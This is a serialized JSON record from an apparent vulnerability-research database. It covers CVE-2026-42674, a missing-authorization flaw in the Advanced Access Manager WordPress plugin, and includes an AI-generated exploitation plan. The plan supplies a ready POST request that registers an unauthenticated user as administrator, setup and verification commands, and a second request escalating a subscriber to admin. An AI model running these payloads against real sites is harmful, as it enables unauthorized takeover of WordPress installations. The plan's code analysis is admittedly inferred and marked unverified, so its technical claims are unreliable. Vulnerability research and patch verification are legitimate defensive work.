[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMMqp7u9KzyBj0E1Lr8d_kF_b4dPc3XsSBwNn0FSo0Xo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-42674","advanced-access-manager-access-governance-for-wordpress-missing-authorization","Advanced Access Manager – Access Governance for WordPress \u003C= 7.1.0 - Missing Authorization","The Advanced Access Manager – Access Governance for WordPress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 7.1.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.","advanced-access-manager",null,"\u003C=7.1.0","7.1.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-14 00:00:00","2026-05-19 16:24:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F15eaba51-e46f-4725-a6f9-7969bf00db5a?source=api-prod",6,[22,23,24,25,26,27,28,29],"aam.php","application\u002FBackend\u002FManager.php","application\u002FBackend\u002Ftmpl\u002Fuser\u002Fmultiple-roles.php","application\u002FFramework\u002FService\u002FAdminToolbar.php","application\u002FFramework\u002FService\u002FMetaboxes.php","application\u002FFramework\u002FService\u002FPolicies.php","application\u002FFramework\u002FUtility\u002FMisc.php","readme.txt","researched",false,3,"### 1. Vulnerability Summary\nThe **Advanced Access Manager (AAM)** plugin for WordPress is vulnerable to **Missing Authorization** in versions up to and including 7.1.0. Specifically, the `AAM_Backend_Manager::profileUpdate` function, which is hooked to `user_register`, does not verify if the requester has the necessary permissions to assign user roles. This allows unauthenticated attackers to assign themselves arbitrary roles (including `administrator`) during the public registration process, provided that the plugin's \"Multi-Role\" feature is enabled.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `wp-login.php?action=register`\n*   **Action**: Public user registration.\n*   **Vulnerable Hook**: `user_register` (registered in `application\u002FBackend\u002FManager.php`).\n*   **Vulnerable Parameter**: `aam_user_roles[]` (array of role slugs).\n*   **Preconditions**:\n    1.  WordPress membership is enabled (`users_can_register`).\n    2.  AAM Multi-Role support is enabled (`core.settings.multi_access_levels`).\n*   **Authentication**: None (Unauthenticated).\n\n### 3. Code Flow\n1.  **Entry Point**: An unauthenticated user submits a POST request to `wp-login.php?action=register`.\n2.  **WordPress Core**: WordPress validates the basic registration data (`user_login`, `user_email`) and creates a new user.\n3.  **Hook Trigger**: After the user is created, WordPress fires the `user_register` action hook, passing the new `$user_id`.\n4.  **Plugin Callback**: `AAM_Backend_Manager::profileUpdate($user_id)` is executed because it is registered to this hook in `application\u002FBackend\u002FManager.php`:\n    ```php\n    if (AAM::api()->config->get('core.settings.multi_access_levels')) {\n        \u002F\u002F ...\n        add_action('user_register', array($this, 'profileUpdate'));\n    }\n    ```\n5.  **Vulnerable Logic**: The `profileUpdate` function (logic inferred from `multiple-roles.php` and the vulnerability description) reads the `aam_user_roles` parameter directly from the `$_POST` superglobal and applies these roles to the newly created `$user_id` without checking if the current requester has `promote_users` or `manage_options` capabilities.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability **bypasses nonce requirements** because the `user_register` hook is a standard WordPress action intended for public use. The core registration process does not utilize plugin-specific nonces. If the `profileUpdate` function fails to implement its own capability check (`current_user_can`), it inherits the unauthenticated context of the registration page.\n\n### 5. Exploitation Strategy\nThe goal is to register a new user and simultaneously assign them the `administrator` role using the `aam_user_roles[]` parameter.\n\n**Step-by-Step Plan:**\n1.  **Initialize Environment**: Ensure AAM is active and the \"Multi-Role\" setting is enabled.\n2.  **Enable Registration**: Ensure WordPress allows public registration.\n3.  **Perform Registration**: Send a POST request to `wp-login.php?action=register`.\n4.  **Payload**:\n    *   `user_login`: `pwned_admin`\n    *   `user_email`: `pwned@example.com`\n    *   `aam_user_roles[]`: `administrator`\n    *   `wp-submit`: `Register`\n\n**HTTP Request (via `http_request` tool):**\n```http\nPOST \u002Fwp-login.php?action=register HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\nuser_login=pwned_admin&user_email=pwned%40example.com&aam_user_roles%5B%5D=administrator&wp-submit=Register\n```\n\n### 6. Test Data Setup\nBefore running the exploit, the environment must be configured as follows:\n1.  **Activate AAM**: `wp plugin activate advanced-access-manager`\n2.  **Enable Multi-Role Support**: \n    ```bash\n    wp eval \"AAM::api()->config->set('core.settings.multi_access_levels', true);\"\n    ```\n3.  **Enable WP Registration**: \n    ```bash\n    wp option update users_can_register 1\n    ```\n\n### 7. Expected Results\n*   The registration should succeed (HTTP 200\u002F302).\n*   A new user with the login `pwned_admin` will be created.\n*   The user `pwned_admin` will be assigned the `administrator` role in addition to (or instead of) the default `subscriber` role.\n\n### 8. Verification Steps\nAfter performing the HTTP request, verify the success of the privilege escalation using WP-CLI:\n```bash\n# Check the roles assigned to the new user\nwp user get pwned_admin --field=roles\n```\n**Success Condition**: The output contains `administrator`.\n\n### 9. Alternative Approaches\nIf the `user_register` hook is restricted or fails, an attacker could attempt the same payload via the `profile_update` hook if they can gain low-level access (e.g., as a Subscriber).\n1.  Login as a Subscriber.\n2.  Navigate to `wp-admin\u002Fprofile.php`.\n3.  Submit a POST update to `profile.php` including `aam_user_roles[]=administrator`.\n4.  If `profileUpdate` is also missing authorization checks for the *self-update* scenario, the Subscriber will elevate themselves to Admin.\n\n**Request for Alternative Strategy:**\n```http\nPOST \u002Fwp-admin\u002Fprofile.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [Subscriber Cookies]\n\n...&user_id=[SELF_ID]&aam_user_roles%5B%5D=administrator&submit=Update+Profile\n```","gemini-3-flash-preview","2026-05-20 17:53:11","2026-05-20 17:54:00",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","7.1.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-access-manager\u002Ftags\u002F7.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-access-manager.7.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-access-manager\u002Ftags\u002F7.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-access-manager.7.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-access-manager\u002Ftags"]